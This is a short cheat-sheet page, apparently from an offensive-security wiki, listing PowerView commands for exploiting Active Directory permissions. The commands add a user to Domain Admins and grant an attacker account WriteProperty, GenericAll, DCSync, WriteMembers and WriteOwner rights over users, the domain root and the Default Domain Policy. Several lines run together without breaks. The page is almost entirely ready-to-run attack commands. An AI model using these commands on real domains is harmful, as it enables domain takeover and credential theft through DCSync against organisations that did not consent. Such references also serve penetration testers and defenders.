Exploitation with Powerview
Examples:
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'USER' -Credential $CredAdd-ObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights WritePropertyAdd-ObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights GenericAllAdd-ObjectAcl -TargetIdentity "DC=example,DC=com" -PrincipalIdentity <attacker_username> -Rights DCSyncAdd-ObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity <attacker_username> -Rights WriteMembers
Add-ObjectAcl -TargetIdentity "Default Domain Policy" -PrincipalIdentity <attacker_username> -Rights WriteProperty
Add-ObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights WriteOwnerLast updated